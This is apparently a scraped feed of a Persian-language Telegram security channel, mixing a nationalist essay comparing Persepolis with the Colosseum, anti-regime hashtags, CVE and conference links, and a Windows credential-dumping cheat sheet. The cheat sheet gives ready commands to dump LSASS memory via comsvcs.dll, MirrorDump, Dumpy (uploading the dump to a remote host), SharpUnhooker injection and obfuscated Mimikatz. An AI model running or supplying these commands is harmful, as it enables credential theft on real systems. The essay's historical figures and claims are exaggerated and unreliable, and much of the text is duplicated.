ﺑﺎﻭﺭ ﮐﻨﯿﺪ ﻫﯿﭻ ﻣﻠﺘﯽ ﺩﺭ ﺩﻧﯿﺎ ﭼﻨﯿﻦ ﮐﻤﺮ ﺑﻪ ﺗﺨﺮﯾﺐ ﻫﻮﯾﺖ ﻭ ﻣﻠﯿﺖ ﻭ ﺗﺎﺭﯾﺦ ﺧﻮﺩ ﻧﺒﺴﺘﻪ ﮐﻪ ﻣﺎ ﺑﺴﺘﻪ ﺍﻳﻢ.
ﺩﺭ ﺍﻧﮕﻠﺴﺘﺎﻥ کاسه ﺳﯿﺼﺪ ﺳﺎﻟﻪ ﭘﯿﺪﺍ ﻣﯿﺸﻮﺩ ﻭ ﺭﺳﺎﻧﻪ ﻫﺎﻳﺸﺎﻥ ﮔﻮﺵ ﺩﻧﯿﺎ ﺭﺍ ﮐﺮ ﻣﯿﮑﻨﻨﺪ
ﻭلی ﻣﺎ ﺗﭙﻪ ﻫﺎ ﻭ ﻣﺤﻮﻃﻪ ﻫﺎﯼ ۷۰۰۰ ﺳﺎﻟﻪ ﮐﻪ ﻣﺪﻧﯿﺖ ﺩﻧﯿﺎ ﺩﺭ آﻥ ﻣﺘﻮﻟﺪ ﺷﺪﻩ ﺭﺍ ﺑﺎ ﻟﻮﺩﺭ ﺗﺨﺮﯾﺐ ﻣﻲ کنیم !!
ﺗﻔﺎﻭﺕ
*ﺍﯾﺮﺍﻥ ﻭ ﺍﺭﻭﭘﺎ!!!*
ﺗﻔﺎﻭﺕ
*( ﺗﺨﺖ ﺟﻤﺸﯿﺪ ) ﺑﺎ( ﮐﻮﻟﻮﺳﯿﻮﻡ)*
@pfksecurity
ﺣﺪﻭﺩ ٤٥ ﺗﺎ ٦٠ ﻫﺰﺍﺭ ﻧﻔﺮ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ، ﺑﺮﺍﻯ ﺳﺎﺧﺘﻦ *ﻛﻮﻟﻮﺳﻴﻮﻡ* ﺑﻪ ﻛﺎﺭﮔﺮﻓﺘﻪ ﺷﺪﻧﺪ .
ﺑﺨﺶ ﺑﺰﺭﮔﻰ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ ﺩﺭ ﺣﻴﻦ ﻛﺎﺭ ﻛﺸﺘﻪ ﺷﺪﻧﺪ .
ﻣﺮﺍﺳﻢ ﺍﻓﺘﺘﺎﺣﻴﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺎ ﻛﺸﺘﺎﺭ ٩ ﻫﺰﺍﺭ ﺣﻴﻮﺍﻥ ﻏﻴﺮﺍﻫﻠﻰ ﺑﺮﮔﺰﺍﺭ ﺷﺪ .
ﺩﺭ ﻛﻮﻟﺴﻴﻮﻡ ﺯﻧﺎﻥ ﻭ ﻣﺮﺩﺍﻥ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﻮﺩﻧﺪ .
ﺟﺎﻳﮕﺎﻩ ﺯﻧﺎﻥ ﺩﺭ ﻃﺒﻘﻪ ﭘﻨﺠﻢ ﺑﻮﺩ، ﻛﻪ ﺩﻳد بسیار ﺑﺪﻯ ﺑﻪ ﻣﻴﺪﺍﻥ ﺩﺍﺷﺖ .
ﺟﺎﻳﮕﺎﻩ ﻣﺨﺼﻮﺹ ﺯﻧﺎﻥ ﺩﺭ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺴﻴﺎﺭ ﻧﺎﺍﻣﻦ ﻭ ﺧﻄﺮﻧﺎﻙ بوﺩ، ﭼﺮﺍ ﻛﻪ ﺳﻜﻮﻫﺎﻯ ﺁﻧﻬﺎ ﺑﺎ ﻃﻨﺎﺏ ﻫﺎﻳﻰ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﻣﻴﺸﺪ ﻛﻪ ﻫﺮ ﺍﺯ ﭼﻨﺪﻯ ﭘﺎﺭﻩ ﻣﻴﺸﺪﻧﺪ
ﻭ ﺯﻧﺎﻥ ﺍﺯ ﺍﺭﺗﻔﺎﻉ ٥٠ ﻣﺘﺮﻯ ﺑﻪ ﭘﺎﻳﻴﻦ ﺳﻘﻮﻃﻰ ﻣﺮﮔﺒﺎﺭ ﻣﻴﻜﺮﺩﻧﺪ . ﺍﻣﺎ ﺟﺎﻳﮕﺎﻩ ﻣﺮﺩﺍﻥ ﺑﺴﻴﺎﺭ ﺍﻣﻦ ﺑﻮﺩ . ﺁﻧﻬﺎ ﺑﺮ ﺭﻭﻯ ﺳﻜﻮﻫﺎﻯ ﺳﻨﮕﻰ ﻣﻰ ﻧﺸﺴﺘﻨﺪ .
ﻛﻮﻟﻮﺳﻴﻮﻡ، ﻣﺤﻞ ﺑﺮﮔﺰﺍﺭﻯ ﺟﺸﻨﻬﺎﻯ ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﺑﻮﺩ .
ﺩﺭ ﻃﻰ ﺍﻳﻦ ﺟﺸﻨﻬﺎ، ﻛﻪ ﻫﺮباﺭ ١٠٠ ﺭﻭﺯ ﺑﻪ ﺩﺭﺍﺯﺍ ﻣﻴﻜﺸﻴﺪ، ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﺭﺍ ﺑﻪ ﺟﺎﻥ ﺑﺮﺩﮔﺎﻥ ﻭ ﮔﻼﺩﻳﺎﺗﻮﺭﻫﺎ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﻭ ﻳﺎ ﮔﻼﺩﻳﻮﺗﻮﺭﻫﺎ، ﻛﻪ ﺑﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺍﻣﻴﺪ ﺑﻪ ﺯﻧﺪﮔﻰ ﺁﻧﻬﺎ ﺑﻪ ﺳﺨﺘﻰ ﺑﻪ ٢٢ ﺳﺎﻟﮕﻰ ﻣﻴﺮﺳﻴﺪ، ﺭﺍ ﻣﺠﺒﻮﺭ ﺑﻪ ﻛﺸﺘﻦ ﻳﻜﺪﻳﮕﺮ ﻣﻴﻜﺮﺩﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺍﻳﻦ ﻛﺸﺘﺎﺭ ﺑﻮﺩﻧﺪ ﻭ ﺍﺯ ﺁﻥ ﻟﺬﺕ ﻣﻴﺒﺮﺩﻧﺪ .
ﺩﺭ ﻃﻰ ﻫﺮ ﺩﻭﺭﻩ ﺍﺯ ﺍﻳﻦ ﺟﺸﻦ ﻫﺎ ﺣﺪﻭﺩ ٥ ﻫﺰﺍﺭ ﺑﺮﺩﻩ ﻭ ﮔﻼﺩﻳﻮﺗﻮﺭ ﺑﻪ ﻗﺘﻞ ﻣﻴﺮﺳﻴﺪﻧﺪ .
ﺩﺭ ﺭﻭﺯﻫﺎﻳﻰ ﻛﻪ ﺟﺸﻦ ﺑﺮﻗﺮﺍﺭ ﻧﺒﻮﺩ، ﻣﺤﻜﻮﻣﺎﻥ ﺑﻪ ﻣﺮﮒ ﺭﺍ ﺟﻠﻮﻯ ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﺗﺎ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﻮﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﺪﻥ ﺍﻳﻦ ﺁﺩﻣﻴﺎﻥِ تیره ﺑﺨﺖ ﺑﻮﺩﻧﺪ .
ﺩﺭ ﻛﻞ،
*ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، ﺍﺯ ﺟﻤﻠﻪ ٥٠٠ ﺗﺎ ٧٠٠ ﻫﺰﺍﺭ ﮔﻼﺩﻳﺎﺗﻮﺭ، ﺩﺭ ﺻﺤﻦ ﻛﻠﻮﺳﻴﻮﻡ ﺑﻪ ﻃﺮﺯ ﻭﺣﺸﻴﺎﻧﻪ ﺍﻯ ﻛﺸﺘﻪ ﺷﺪﻧﺪ* .
ﺍﻳﻦ ﻣﻴﺪﺍﻥ ﭼﻬﺎﺭ ﻫﺰﺍﺭ ﻣﺘﺮ ﻣﺮﺑﻌﻰ، ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺘﻠﮕﺎﻩ ﺗﺎﺭﻳﺦ ﺑﺸﺮﻳﺖ ﺑﻮﺩﻩ ﺍﺳﺖ .
ﺍﻣﺮﻭﺯﻩ، ﻛﻮﻟﻮﺳﻴﻮﻡ ﻣﺤﺒﻮﺑﺘﺮﻳﻦ ﺑﻨﺎﻯ ﺍﻳﺘﺎﻟﻴﺎ، ﻧﻤﺎﺩ ﺷﻬﺮ ﺭﻡ ﻭ ﺗﻤﺪﻥ ﺭﻭﻣﻰ ﺍﺳﺖ .
ﻫﻤﻪ ﺭوﻣﻴﺎﻥ،ایتاﻟﻴﺎﻳﻴﻬﺎ ﻭ ﺣﺘﻰ ﺍﺭﻭﭘﺎﻳﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﺗﻤﺪﻥ ﺍﻓﺘﺨﺎﺭ ﻣﻴﻜﻨﻨﺪ . !
ﺩﺭ ﺳﺎﻝ ٢٠٠٧، ﺩﺭ ﻃﻰ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻰ ﺑﺎ ﺷﺮﻛﺖ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، *ﻛﻮﻟﻮﺳﻴﻮﻡ ﺟﺰﻭ ٧ ﺍﺛﺮ* ﺑﺮﺗﺮ ﻭ ﻣﺤﺒﻮﺏ ﺟﻬﺎﻥ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ .!!!
ﺩﺭ ﺳﺎﻝ ٢٠١١، ﻣﺒﻠﻎ ٢٥ ﻣﻴﻠﻴﻮﻥ ﻳﻮﺭﻭ، ﺗﻨﻬﺎ ﺑﺮﺍﻯ ﺗﻤﻴﺰ ﻛﺮﺩﻥ ﺩﻳﻮﺍﺭﻫﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ ﻭ ﭼﻨﺪ ﻛﺎﺭ
ﺑﺴﻴﺎﺭ ﺟﺰﻳﻰ ﺩﻳﮕﺮ ﺩﺭ ﺩﺭﻭﻥ ﺁﻥ، ﻫﺰﻳﻨﻪ ﺷﺪ .
ﻳﻚ ﺿﺮﺏ ﺍﻟﻤﺜﻞ ﻗﺪﻳﻤﻰ ﺍﻳﺘﺎﻟﻴﺎﻳﻰ ﻣﻴﮕﻮﻳﺪ :
*" تازﻣﺎﻧﻰ ﻛﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ، ﺭﻡ ﻧﻴﺰ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ".*
ﺣﺪﻭﺩ ٦٠٠ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺳﺎﺧﺘﻪ ﺷﺪﻥ ﻛﻮﻟﻮﺳﻴﻮﻡ، ﺍﻳﺮﺍﻧﻴﺎﻥ *ﺗﺨﺖ ﺟﻤﺸﻴﺪ* ﺭﺍ ﺳﺎﺧﺘﻨﺪ .
*-ﺍﺛﺮﻯ ﭘﺮﺷﻜﻮﻩ ﺑﺎ ﺯﻳﺮﺑﻨﺎﻯ ١٧٥ ﻫﺰﺍﺭ ﻣﺘﺮ - ٨ ﺑﺮﺍﺑﺮ ﻛﻞ ﺯﻳﺮﺑﻨﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ* .
ﺑﺮ ﺍﺳﺎﺱ ﺳﻨﺪﻫﺎﻯ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻧﻜﺎﺭ - ﺧﺸﺖ ﻫﺎﻯ ﭘﺨﺘﻪ ﺷﺪﻩ ﺁﻥ ﺯﻣﺎﻥ
*-ﺩﺭ ﺳﺎﺧﺘﻦ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻫﻴﭻ ﺑﺮﺩﻩ ﺍﻯ ﺑﻪ ﻛﺎﺭ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ*.
ﻛﺎﺭﮔﺮﺍﻥ، ﻣﻬﻨﺪﺳﺎﻥ ﻭ ﻫﻨﺮﻣﻨﺪﺍﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﺷﺮﺍﻳﻂِ ﻛﺎﺭﻯِ ﻣﻤﻜﻦ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﺑﺸﺮﻯ ﺭﺍ ﺁﻓﺮﻳﺪﻧﺪ .
ﭘﺎﺩﺷﺎﻫﺎﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﺟﺸﻨﻬﺎﻯ ﺍﻳﺮﺍﻧﻰ ﻣﺎﻧﻨﺪ *ﻧﻮﺭﻭﺯﻭﻣﻬﺮﮔﺎﻥ*،
ﻛﻪ ﺭﻳﺸﻪ ﺩﺭ *ﺁﺷﺘﻰ، ﻣﻬﺮ، ﻃﺒﻴﻌﺖ ﻭ ﺯﻧﺪﮔﻰ ﺍﻧﺴﺎﻧﻰ ﺩﺍﺭﺩ*، ﺭﺍ ﺑﺮﭘﺎ ﻣﻴﺪﺍﺷﺘﻨﺪ .
ﻫﻤﻪ ﻧﮕﺎﺭﻩ ﻫﺎﻯ ﺣﻚ ﺷﺪﻩ ﺑﺮ ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺳﻨﮕﻬﺎﻯ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻧﺸﺎﻧﮕﺮ *ﺟﺸﻨﻬﺎ، ﻓﺮﻫﻨﮓ ﻭ ﻣﻴﺘﻮﻟﻮﮊﻯ ﺯﻳﺒﺎﻯ ﺍﻳﺮﺍﻧﻰاست.*
درتصاویرحکاکی شده برسنگ نبشته های تخت جمشید ،
هیچکس خشمگین وعصبانی نیست،
هیچکس سوار بر اسب نیست،
هیچکس رادرحال تعظیم نمی بینید،
هیچ زمان برده داری در ایران نبوده،
درمیان این همه پیکر تراشیده شده، حتی یک نقش،تصویر وچهره ی برهنه وجود ندارد.
*ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻣﺮﻛﺰ ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺪﺭﺕ ﺟﻬﺎﻥ ﺩﺭ ﺁﻥ ﺭﻭﺯﮔﺎﺭ ﺑﻮﺩﻩ ﺍﺳﺖ* .
ﺍﻣﺎ ﺑﺮﺧﻮﺭﺩ ﺑﺮﺧﻰ ﺍﺯ ﻣﺎ ﺍﻳﺮﺍﻧﻴﺎﻥ، ﺑﻪ ﻭﻳﮋﻩ واپسگرایان ﻭ ﺑﺮﺧﻰ ﻣﺪﻋﻴﺎﻥ ﺭﻭﺷﻨﻔﻜﺮﻯ، ﺑﺎ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﻫﻨﺮﻯ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﻏﻴﺮﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻧﺎﺑﺨﺮﺩﺍﻧﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﯿﺪ ۳۲ ﻫﺰﺍﺭ ﻟﻮﺡ ﮔﻠﯽ ﺑﺪﺳﺖ آﻣﺪﻩ ﮐﻪ ﺩﺭ ﺍﻥ ﺷﺮﺡ ﻭﻗﺎﯾﻊ ﺭﻭﺯﺍﻧﻪ ﺭﺍ ﺩﺭ ﻣﺮﺍﺣﻞ ﺳﺎﺧﺖ ﺍﯾﻦ ﺑﻨﺎﯼ ﺑﺎﺷﮑﻮﻩ ﺑﯿﺎﻥ ﻣﯿﮑﻨﺪ ﺑﺎ ﺗﻤﺎﻡ ﺟﺰﺋﯿﺎﺕ ﻣﺜل ﺍﯾﻨﮑﻪ ﮐﺎﺭﮔﺮﺍﻥ و ﻣﻬﻨﺪﺳﺎﻥ ﻫﺮ ﮐﺪﺍﻡ ﺑﻪ ﻧﻮﻉ ﺗﺨﺼﺼﯽ ﮐﻪ ﺩﺍﺭند ﭼﻪ ﻣﯿﺰﺍﻥ ﺣﻘﻮﻕ ﺩﺭﯾﺎﻓﺖ ﻣﯿﮑﻨﻨﺪ،
*ﮐﺸﻮﺭﻫﺎﯼ ﺩﺍﻋﯿﻪ ﺩﺍﺭ ﺣﻘﻮﻕ ﺑﺸﺮ ﺑﻪ ﭼﻪ ﭼﯿﺰﯼ ﻣﻔﺘﺨﺮﻥ ﻭ ﻣﺎ ﭼﻪ ﭼﯿﺰﯼ ﺭﺍ ﻟﻌﻦ ﻭ ﻧﻔﺮﯾﻦ ﻣﯿﮑﻨﯿﻢ ﻭ ﻧﻤﺎﺩﯼ ﺍﺯ ﻇﻠﻢ ﻭ ﺳﺘﻢ ﺟﺒﺎﺭﺍﻥ ﻭ ﺳﺘﻤﮕﺮﺍﻥ ﺭﻭﺯﮔﺎﺭ ﻣﯿﺪاﻧﯿﻢ*.
ﺑﺎﻭﺭ ﮐﻨﯿﺪ ﻫﯿﭻ ﻣﻠﺘﯽ ﺩﺭ ﺩﻧﯿﺎ ﭼﻨﯿﻦ ﮐﻤﺮ ﺑﻪ ﺗﺨﺮﯾﺐ ﻫﻮﯾﺖ ﻭ ﻣﻠﯿﺖ ﻭ ﺗﺎﺭﯾﺦ ﺧﻮﺩ ﻧﺒﺴﺘﻪ ﮐﻪ ﻣﺎ ﺑﺴﺘﻪ ﺍﻳﻢ.
ﺩﺭ ﺍﻧﮕﻠﺴﺘﺎﻥ کاسه ﺳﯿﺼﺪ ﺳﺎﻟﻪ ﭘﯿﺪﺍ ﻣﯿﺸﻮﺩ ﻭ ﺭﺳﺎﻧﻪ ﻫﺎﻳﺸﺎﻥ ﮔﻮﺵ ﺩﻧﯿﺎ ﺭﺍ ﮐﺮ ﻣﯿﮑﻨﻨﺪ
ﻭلی ﻣﺎ ﺗﭙﻪ ﻫﺎ ﻭ ﻣﺤﻮﻃﻪ ﻫﺎﯼ ۷۰۰۰ ﺳﺎﻟﻪ ﮐﻪ ﻣﺪﻧﯿﺖ ﺩﻧﯿﺎ ﺩﺭ آﻥ ﻣﺘﻮﻟﺪ ﺷﺪﻩ ﺭﺍ ﺑﺎ ﻟﻮﺩﺭ ﺗﺨﺮﯾﺐ ﻣﻲ کنیم !!
ﺗﻔﺎﻭﺕ
*ﺍﯾﺮﺍﻥ ﻭ ﺍﺭﻭﭘﺎ!!!*
ﺗﻔﺎﻭﺕ
*( ﺗﺨﺖ ﺟﻤﺸﯿﺪ ) ﺑﺎ( ﮐﻮﻟﻮﺳﯿﻮﻡ)*
@pfksecurity
آکادمی راوین وابسته به وزارت اطلاعات امروز توسط دولت کانادا تحریم شد.
#راوین #آکادمی_راوین #تحریم
@PfkSecurity
#راوین #آکادمی_راوین #تحریم
@PfkSecurity
#CVE-2023-1177:
هک هوش مصنوعی
- کنترل سیستم و ابر از طریق MLflow Exploit (LFI/RFI در MLflow 2.1.1)
https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/
https://protectai.com/blog/hacking-ai-system-takeover-exploit-in-mlflow
@PfkSecurity
هک هوش مصنوعی
- کنترل سیستم و ابر از طریق MLflow Exploit (LFI/RFI در MLflow 2.1.1)
https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/
https://protectai.com/blog/hacking-ai-system-takeover-exploit-in-mlflow
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
فریدون فرخزاد و رسیدن به هویت ملی
بشنویم از زبان جاویدنام #فریدون_فرخزاد
#نه_به_اسلام
#نه_به_جمهوری_اسلامی
@PfkSecurity
بشنویم از زبان جاویدنام #فریدون_فرخزاد
#نه_به_اسلام
#نه_به_جمهوری_اسلامی
@PfkSecurity
Spyware vendors use 0-days and n-days against popular platforms
https://blog.google/threat-analysis-group/spyware-vendors-use-0-days-and-n-days-against-popular-platforms/
@PfkSecurity
https://blog.google/threat-analysis-group/spyware-vendors-use-0-days-and-n-days-against-popular-platforms/
@PfkSecurity
Google
Spyware vendors use 0-days and n-days against popular platforms
Google’s Threat Analysis Group (TAG) tracks actors involved in information operations (IO), government backed attacks and financially motivated abuse. For years, TAG has…
#0x41 > Comsvcs.dll
Methods:
#0x42 > MirrorDump
Methods:
#0x43 >Dumpy
Methods:
#0x44 >RToolZ+ProcExp152.sys
Methods:
#0x45>SharpUnhooker+LsassUnhooker
Methods:
#0x46 >hashdump
Methods:
#0x47 >Mimikatz+Invoke-Obfuscation
Methods:
#0x48 > BetterSafetyKatz
Methods
#lass
@PfkSecurity
Methods:
regsvr32 comsvcs.dll rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.exe lsass.dmp full#0x42 > MirrorDump
Methods:
.\MirrorDump.exe -f “NotLSASS.zip” -d “LegitLSAPlugin.dll” -l 1073741824#0x43 >Dumpy
Methods:
dumpy.exe dump -k secretKey -u https://remotehost/upload force#0x44 >RToolZ+ProcExp152.sys
Methods:
.\procexp64.exe -accepteula /t RToolZ -p#0x45>SharpUnhooker+LsassUnhooker
Methods:
LsassUnhooker.exe -r SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin#0x46 >hashdump
Methods:
Kldumper.exe laZagne_x64.exe PwDump7.exe QuarksPwDump.exe SqlDumper.exe Wce_x64.exe SAMInside.exe#0x47 >Mimikatz+Invoke-Obfuscation
Methods:
Invoke-Obfuscation -ScriptBlock { [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes(‘C:\mimikatz.exe’)) } -Command ‘Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(“JABzAD0ATwB2AGkAZQBzAC4AQwBvAG0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAGMAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQBOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAHMAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZABvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgAZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvAHAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJwApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAdAAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzAGgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAKQBdACkA”)]))’Import-Module PowerSploit Invoke-Mimikatz -DumpCreds#0x48 > BetterSafetyKatz
Methods
: .\BetterSafetyKatz.exe .\BetterSafetyKatz.exe ‘.\mimikatz_trunk.zip’
Sekurlsa::minidump
#lass
@PfkSecurity
استفاده از دستاورد دیگران برای جذب مخاطب یک کار غیر اخلاقی دیگر است و عدم وجود مدیریت صحیح در انتشار پست ها باعث کشف RCE و Buffer Overflow میشود😂 از این رو Buffer Overflow که توسط آن ، RCE بدست امده اینگونه متلاشی میشود که یک ایرانی که سواد کافی جهت فعالیت در حوزه امنیت را ندارد شروع به نوشتن writeup میکند !
در ایران گویا دروغ گفتن عادت شده ؛ در تاریخ و ساعت :
December 21, 2018 12:21pm +0330
یک گزارش در هکروان توسط :
vinnievan
ثبت شده است ؛ لینک :
https://hackerone.com/reports/470520
گویا یک ایرانی طبق تصویر مدعی شده که توانسته Buffer Overflow از CSGO کشف کند :) گزارشی که توسط فرد / افراد دیگری گزارش شده است ! استاد شما به خودی خود یک buffer overflow ثبت نکرده بودن عزیز... !
دنیای امنیت را به گند نکشید .
#APTIran
@PfkSecurity
در ایران گویا دروغ گفتن عادت شده ؛ در تاریخ و ساعت :
December 21, 2018 12:21pm +0330
یک گزارش در هکروان توسط :
vinnievan
ثبت شده است ؛ لینک :
https://hackerone.com/reports/470520
گویا یک ایرانی طبق تصویر مدعی شده که توانسته Buffer Overflow از CSGO کشف کند :) گزارشی که توسط فرد / افراد دیگری گزارش شده است ! استاد شما به خودی خود یک buffer overflow ثبت نکرده بودن عزیز... !
دنیای امنیت را به گند نکشید .
#APTIran
@PfkSecurity
اجراهای ضبط شده از BlackHat22 رسید!
مجموعه ای از گزارش های مختلف در مورد رمزنگاری خارجی، داخلی، معکوس.
لیست پخش:
- آسیب پذیری در ماتریس.
- حملات به AFDS
- حمله به خودروهای الکتریکی
- حملات به Kerberos RC4.
- بایپس EDR؛
- حملات به قراردادهای هوشمند؛
- دور زدن WAF:
- حملات در سطح کانال.
https://yewtu.be/watch?v=V_HwRtUk5tI&list=PLH15HpR5qRsVY4gZPQrkdVBeR_BwNujGe
@PfkSecurity
مجموعه ای از گزارش های مختلف در مورد رمزنگاری خارجی، داخلی، معکوس.
لیست پخش:
- آسیب پذیری در ماتریس.
- حملات به AFDS
- حمله به خودروهای الکتریکی
- حملات به Kerberos RC4.
- بایپس EDR؛
- حملات به قراردادهای هوشمند؛
- دور زدن WAF:
- حملات در سطح کانال.
https://yewtu.be/watch?v=V_HwRtUk5tI&list=PLH15HpR5qRsVY4gZPQrkdVBeR_BwNujGe
@PfkSecurity